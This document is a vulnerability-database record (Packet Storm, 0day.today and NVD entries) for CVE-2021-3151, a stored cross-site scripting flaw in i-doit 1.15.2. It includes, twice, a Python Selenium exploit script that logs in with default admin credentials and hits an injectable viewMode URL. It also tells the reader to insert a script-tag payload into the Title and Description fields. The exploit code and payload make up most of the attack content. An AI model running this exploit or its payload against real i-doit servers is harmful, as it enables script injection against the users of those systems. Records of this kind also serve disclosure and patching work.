{"id": "PACKETSTORM:162815", "type": "packetstorm", "bulletinFamily": "exploit", "title": "i-doit 1.15.2 Cross Site Scripting", "description": "", "published": "2021-05-26T00:00:00", "modified": "2021-05-26T00:00:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://packetstormsecurity.com/files/162815/i-doit-1.15.2-Cross-Site-Scripting.html", "reporter": "nu11secur1ty", "references": [], "cvelist": ["CVE-2021-3151"], "immutableFields": [], "lastseen": "2021-05-26T18:01:24", "viewCount": 76, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-3151"]}, {"type": "zdt", "idList": ["1337DAY-ID-36294"]}], "rev": 4}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-3151"]}, {"type": "zdt", "idList": ["1337DAY-ID-36294"]}]}, "exploitation": null, "vulnersScore": 4.2}, "sourceHref": "https://packetstormsecurity.com/files/download/162815/idoit1152-xss.txt", "sourceData": "`# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from Infrastructure \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 05.25.2021 \n# Vendor: https://www.i-doit.org/news/ \n# Link: https://www.i-doit.org/new-minor-release-i-doit-open-1-15-2/ \n# From Github: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip \n# CVE: CVE-2021-3151 - NEW \n# Proof: https://streamable.com/vofczm \n \n[+] Exploit Source: \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-3151 \n \nfrom selenium import webdriver \nimport time \nimport os, sys \n \n \n# Vendor: https://www.i-doit.org/news/ \nwebsite_link=\"http://192.168.1.160/?\" \n \n# enter your login username \nusername=\"admin\" \n \n# enter your login password \npassword=\"admin\" \n \n#enter the element for username input field \nelement_for_username=\"login_username\" \n \n#enter the element for password input field \nelement_for_password=\"login_password\" \n \n#enter the element for submit button \nelement_for_submit=\"login_submit\" \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(1) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit XSS vulnerability parameter viewMode \ntime.sleep(3) \n# Payload Parameter: \"viewMode\" (Infrastructure > catgID=41 == XSS \ninjection simbol{'}) \nbrowser.get((\" \nhttp://192.168.1.160/index.php?viewMode=1002&tvMode=1006&tvType=1&objID=26&catgID=41%27 \n\")) \n \nprint(\"The payload is deployed now this is bad for the owner \\;)\\...\\n\") \n \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Sorry, but something is wrong and this exploit is not working...\") \n \n## The exploit \n \n## Vulnerable (Infrastructure) section \n## Parameter: \nviewMode (Infrastructure, Object, Network > local pots = XSS simbol{'}) \n \n- URL \n \nhttp://192.168.1.2/?viewMode=1100&tvMode=1006&tvType=1&objID=26&catgID=41&objTypeID=19&cateID=1&editMode=1 \n \n## insert the payload into: \n \nTitle: <script>alert(\"nu11secur1ty_is_here\");</script> \nDescription: <script>alert(\"nu11secur1ty_is_here\");</script> \n \n--------------------------------- \n \n# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from \nInfrastructure \n# Date: 05.25.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: https://www.i-doit.org/news/ \n# Software Link: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3151 \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646237486}}
{"zdt": [{"lastseen": "2021-11-08T14:23:34", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-26T00:00:00", "type": "zdt", "title": "i-doit 1.15.2 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3151"], "modified": "2021-05-26T00:00:00", "id": "1337DAY-ID-36294", "href": "https://0day.today/exploit/description/36294", "sourceData": "# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from Infrastructure\n# Author: @nu11secur1ty\n# Testing and Debugging: @nu11secur1ty\n# Date: 05.25.2021\n# Vendor: https://www.i-doit.org/news/\n# Link: https://www.i-doit.org/new-minor-release-i-doit-open-1-15-2/\n# From Github:\nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip\n# CVE: CVE-2021-3151 - NEW\n# Proof: https://streamable.com/vofczm\n\n[+] Exploit Source:\n#!/usr/bin/python3\n# Author: @nu11secur1ty\n# CVE-2021-3151\n\nfrom selenium import webdriver\nimport time\nimport os, sys\n\n\n# Vendor: https://www.i-doit.org/news/\nwebsite_link=\"http://192.168.1.160/?\"\n\n# enter your login username\nusername=\"admin\"\n\n# enter your login password\npassword=\"admin\"\n\n#enter the element for username input field\nelement_for_username=\"login_username\"\n\n#enter the element for password input field\nelement_for_password=\"login_password\"\n\n#enter the element for submit button\nelement_for_submit=\"login_submit\"\n\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\nchromedriver]\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\n\ntime.sleep(1)\nbrowser.get((website_link))\n\ntry:\nusername_element = browser.find_element_by_name(element_for_username)\nusername_element.send_keys(username)\npassword_element = browser.find_element_by_name(element_for_password)\npassword_element.send_keys(password)\nsignInButton = browser.find_element_by_name(element_for_submit)\nsignInButton.click()\n\n# Exploit XSS vulnerability parameter viewMode\ntime.sleep(3)\n# Payload Parameter: \"viewMode\" (Infrastructure > catgID=41 == XSS\ninjection simbol{'})\nbrowser.get((\"\nhttp://192.168.1.160/index.php?viewMode=1002&tvMode=1006&tvType=1&objID=26&catgID=41%27\n\"))\n\nprint(\"The payload is deployed now this is bad for the owner \\;)\\...\\n\")\n\n\nexcept Exception:\n#### This exception occurs if the element are not found in the webpage.\nprint(\"Sorry, but something is wrong and this exploit is not working...\")\n\n## The exploit\n\n## Vulnerable (Infrastructure) section\n## Parameter:\nviewMode (Infrastructure, Object, Network > local pots = XSS simbol{'})\n\n- URL\n\nhttp://192.168.1.2/?viewMode=1100&tvMode=1006&tvType=1&objID=26&catgID=41&objTypeID=19&cateID=1&editMode=1\n\n## insert the payload into:\n\nTitle: <script>alert(\"nu11secur1ty_is_here\");</script>\nDescription: <script>alert(\"nu11secur1ty_is_here\");</script>\n\n---------------------------------\n\n# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from\nInfrastructure\n# Date: 05.25.2021\n# Exploit Authotr idea: @nu11secur1ty\n# Exploit Debugging: @nu11secur1ty\n# Vendor Homepage: https://www.i-doit.org/news/\n# Software Link:\nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip\n# Steps to Reproduce:\nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3151\n", "sourceHref": "https://0day.today/exploit/36294", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T18:03:41", "description": "i-doit before 1.16.0 is affected by Stored Cross-Site Scripting (XSS) issues that could allow remote authenticated attackers to inject arbitrary web script or HTML via C__MONITORING__CONFIG__TITLE, SM2__C__MONITORING__CONFIG__TITLE, C__MONITORING__CONFIG__PATH, SM2__C__MONITORING__CONFIG__PATH, C__MONITORING__CONFIG__ADDRESS, or SM2__C__MONITORING__CONFIG__ADDRESS.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-02-27T05:15:00", "type": "cve", "title": "CVE-2021-3151", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3151"], "modified": "2021-06-03T16:35:00", "cpe": [], "id": "CVE-2021-3151", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3151", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}]}